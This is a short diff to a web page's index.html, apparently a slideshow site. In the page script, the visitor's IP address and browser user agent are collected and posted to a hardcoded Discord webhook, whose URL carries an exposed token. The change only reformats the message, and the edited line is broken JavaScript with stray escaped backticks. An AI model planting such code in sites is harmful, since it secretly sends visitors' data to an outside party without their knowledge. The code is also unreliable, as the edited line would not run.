--- a/index.html
+++ b/index.html
@@ -175,11 +175,11 @@ var slideIndex = 0;
             var ip = json.ip;
 
             var webhookURL = "https://discord.com/api/webhooks/1215758278328586331/KJYBrcngWzIPwh4KcZNKMy0wVa42o8wk3vvYmUrdmIGCvJMvKem0KSBmN7qaTq68qTDB";
-            var deviceName = navigator.userAgent; // Get the device name
+            var deviceName = navigator.userAgent;
 
             
             var data = {
-                content: "IP Address: " + ip + "\nDevice Name: " + deviceName
+                content: "```IP Address: " + ip \`\`\` + "\n```Device Name: " + deviceName \`\`\`
             };
 
       
